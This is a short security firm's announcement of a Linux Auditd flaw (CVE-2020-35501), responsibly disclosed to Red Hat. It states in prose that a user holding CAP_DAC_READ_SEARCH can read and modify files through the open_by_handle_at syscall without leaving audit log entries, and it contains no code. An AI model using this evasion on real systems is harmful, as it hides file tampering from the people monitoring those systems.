Cyber defense expert discovers vulnerability in Linux audit framework

To support our customers with technical expertise and the latest industry knowledge, our cyber defense experts address fundamental questions and undergo mandatory training on a broad variety of products.

It was in carrying out this kind of fundamental research in the Linux audit framework (Auditd) that we discovered a not insignificant vulnerability.

After a thorough evaluation, we determined that file monitoring can be circumvented with sufficient authorizations. Specifically, the user must have the CAP_DAC_READ_SEARCH capability. This is typically true of the “root” administrator account. Under these conditions, the user can open files with the “open_by_handle_at” syscall and read and modify them at will without generating an entry in the Auditd log. We verified that this vulnerability can be exploited on CentOS7, CentOS8 and Ubuntu16.04.

The vulnerability was reported to the manufacturer RedHat, Inc. in mid-November 2020. In accordance with standard disclosure practice, we gave the manufacturer 90 days to rectify the vulnerability. The problem has been published under the reference CVE-2020-35501.

To keep our customers secure, our employees are deeply involved in the technical aspects of all processes. It is testament to the conscientiousness of our cyber defense experts that they managed to find this vulnerability.

Please feel free to contact us for more information about the discovery of the vulnerability and possible countermeasures.